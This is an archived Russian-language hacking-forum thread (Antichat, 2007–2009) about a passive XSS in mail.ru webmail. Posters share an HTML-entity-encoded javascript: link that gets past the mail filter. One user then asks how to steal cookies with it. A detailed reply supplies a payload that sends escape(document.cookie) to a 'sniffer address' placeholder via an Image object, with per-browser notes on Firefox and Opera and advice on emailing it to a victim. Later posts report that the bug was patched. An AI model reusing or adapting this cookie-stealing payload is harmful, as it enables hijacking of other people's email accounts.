Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   E-Mail (https://forum.antichat.xyz/forumdisplay.php?f=14)
-   -   XSS на mail.ru (https://forum.antichat.xyz/showthread.php?t=47297)

~EviL~ 22.08.2007 01:00

XSS на mail.ru
 
Только что нашел свежайшую XSS на mail.ru (пассивная):

<a href=&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116:alert('XSS')>Текст</a>

1NtR0 22.08.2007 01:09

Ne rabotaet!

http://1intro.info/ne%20pashet.jpg

~EviL~ 22.08.2007 01:22

У меня сработало... хз, ща проверю снова.

~EviL~ 22.08.2007 01:48

http://cskacrazyfan.data.bg/screen1.bmp
http://cskacrazyfan.data.bg/screen2.bmp

Вот, все получается. :)

Skaret 22.08.2007 08:49

Слушай,лутше кинь свою Xss не в зашифрованном виде

n1†R0x 22.08.2007 09:38

такое будет работать только в ИЕ, если мне не изменяет память.

inv 22.08.2007 09:40

проверил такую ссылку на локалхосте в опере-работает

n1†R0x 22.08.2007 09:46

Для того, чтобы оно работало, нужно отправлять письмо в HTML (да и то я не особо уверен, что фильтры не порежут)

В незашифрованном виде оно выглядит весьма банально:
Код:

<a href=javascript:alert('XSS')>Текст</a>

K1nD[e]R 22.08.2007 13:01

Все сработало на Ура!

inv 22.08.2007 14:11

в локалке сработало....на почте нет так как & заменилось на &amp; посылал письмо в формате htm с того же mail.ru

~EviL~ 22.08.2007 14:30

2Skaret
Фишка то в том, чтоб обойти фильтр. В незашифрованном виде код такой:
<a href=javascript:alert('XSS')>Текст</a>
Но такой код не выполнится, поэтому нужен такой:
<a href=&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116:alert('XSS')>Текст</a>

:)

mind 15.10.2007 03:13

плин мужики помогите заюзать багу )))) пишу след код и получаю глюк в Опере:
<a href=&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116:document.images[0].src='http://адрес сниффера/s.gif?'+document.cookie;>Текст</a>
открывается новое окно и никаких куков, а если правой кнопкой мышары и открыть то куки выводятся прямо в браузере!!!
помогите разобраться )

LeverOne 17.10.2007 00:13

"мужики" все в Париже, а вот Я помогу тебе разобраться.

Начнем с того, что "багу" до сих пор еще не прикрыли, это свидетельствует о степени ее опасности. При том, что обычная пассивка на мыл ру, запощенная в этот раздел, держится дай бог неделю, косвенно можно предположить, какова цена этой "свежей" "баги" (с т.зр. саппорта через призму всех отписавшихся до меня :cool: ) .

Так вот, почему ее не прикрыли... Потому что уже сравнительно давно переход по такой ссылке на мыл ру опосредуется принудительно вставляемым в тег ссылки атрибутом target c параметром "_blank". Это значит, что перед тем, как попасть в адресную строку (на выполнение), твой код &#106&#97&#118&#97&#115&#99&#114&#105&#112&#116:document.images[0].src='http://адрес сниффера/s.gif?'+document.cookie; будет помещен на новую страницу. Это все равно что самостоятельно открыть новую страницу, вписать в адресную строку этот код и ждать прихода кук ! :confused: А алерты, конечно, пойдут! Только вот, видимо, очень плохо доходит инфа, что если где-то вдруг выскочил алерт, это не значит, что найдена бага XSS. :)
В отличие от этого, когда ты нажимаешь правой кнопкой "открыть", браузер сам берет ссылку с псевдоскриптом и выполняет его непосредственно в контексте того домена, откуда ее взял. Атрибут target при этом игнорируется. Вот почему ты видишь свои куки в этом случае. Но в ИЕ это не проходит, а в ФФ ссылка правой кнопкой открывается только в новом окне. Остается из популярных только Опера.

Теперь мы пойдем дальше и попробуем выжать из ситуации максимум :cool:

Когда ссылка, нажатая обычным образом или через правую кнопку, открывается в новом окне, где нет никаких картинок, нет смысла обращаться к первой картинке на странице, используя document.images[0].src ! Заменям это обычным динамическим созданием объекта картинки: img=new Image(); img.src
Далее, если посмотреть исходный код открывшейся страницы (при нажатии на ссылку обычным образом), там мы увидим, что на станице отобразилось все, что идет после src= , то есть адрес твоего сниффа. Используем это, вставляя на страницу код, отсылающий куки.
XSS примет вид:
PHP код:

<a href="&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116:img=new Image();img.src='<img src=http://адрес_сниффера/s.gif?'+escape(document.cookie)+'>';">text</a

Объясняю:
- на голую страницу помещается тег img c адресом сниффера
- но к этому адресу динамически прибавляются куки. Однако, куки разделены пробелами, в связи с чем может образоваться обрыв строки и на снифф отправится только первая кука. Мы снимаем эту проблему, преобразуя строку куки функцией escape (обратная - unescape(строка)).
- и, наконец, закрываем тег img

Обычным нажатием этот код будет работать только в ФФ.
В Опере этот код сработает, только если открыть ссылку правой кнопкой.
В ИЕ не сработает.

Письмо отправлять в штмл не с маил ру.

Посмотрим теперь, как быстро прикроют эту "багу". :D

mind 18.10.2007 01:42

LeverOne, огромное тебе спасибо разобрался. к репе ++

nikoTM 19.10.2007 14:20

а вот и баг прикрыли))

ЛифчиС5СВ 25.10.2007 12:20

и сколько она всего прожила? :)

j0nathan 13.11.2007 10:03

полюбому у них шахтёр капает на античате все дыры :) и закрывают потом их надо банить :d

Basurman 13.11.2007 10:23

Цитата:

Сообщение от antichat.ru
Этот проект является попыткой показать пользователям насколько уязвимыми они являются. Что можно узнать о человеке, который просто разговаривает в чате, по ICQ, Odigo. Так же описаны проблемы анонимности и конфиденциальности при работе с сетью Internet...

Античат - прежде всего сайт по безопасности (читай название темы), а не блекхат проект. Кому надо (например mail.ru), смотрят и латают оперативно дырки. В этом суть

chekist 15.11.2007 20:28

этой багой год назад пытались мой ящик взломать, благо я всегда ява скрипты отрубаю

LemoTTT 10.05.2009 18:18

Обясните
 
Давайте вы мне подробнее раскажете:
Вот код:
PHP код:

<a href="&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116:img=new Image();img.src='<img src=http://адрес_сниффера/s.gif?'+escape(document.cookie)+'>';">text</a

Вопрос № 1:
PHP код:

&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116 

Это зашифрованая ссылка на xss? или что?
Вопрос № 2:
Допустим если я как то найду xss на http://torg.mail.ru/
и потом пришлю вышеуказаную ссылку на почту (тоже мейл ру, а если другая почта?)жертве , она пр кн откроет, и все куки мои?

m0Hze 11.05.2009 10:19

яое, ты круче всех чуваг.

R1k 20.05.2009 16:11

Цитата:

Сообщение от LemoTTT
Давайте вы мне подробнее раскажете:
Вот код:
PHP код:

<a href="&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116:img=new Image();img.src='<img src=http://адрес_сниффера/s.gif?'+escape(document.cookie)+'>';">text</a

Вопрос № 1:
PHP код:

&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116 

Это зашифрованая ссылка на xss? или что?
Вопрос № 2:
Допустим если я как то найду xss на http://torg.mail.ru/
и потом пришлю вышеуказаную ссылку на почту (тоже мейл ру, а если другая почта?)жертве , она пр кн откроет, и все куки мои?

Баг уже прикрыли))) Можешь не пытаться даже


Время: 14:12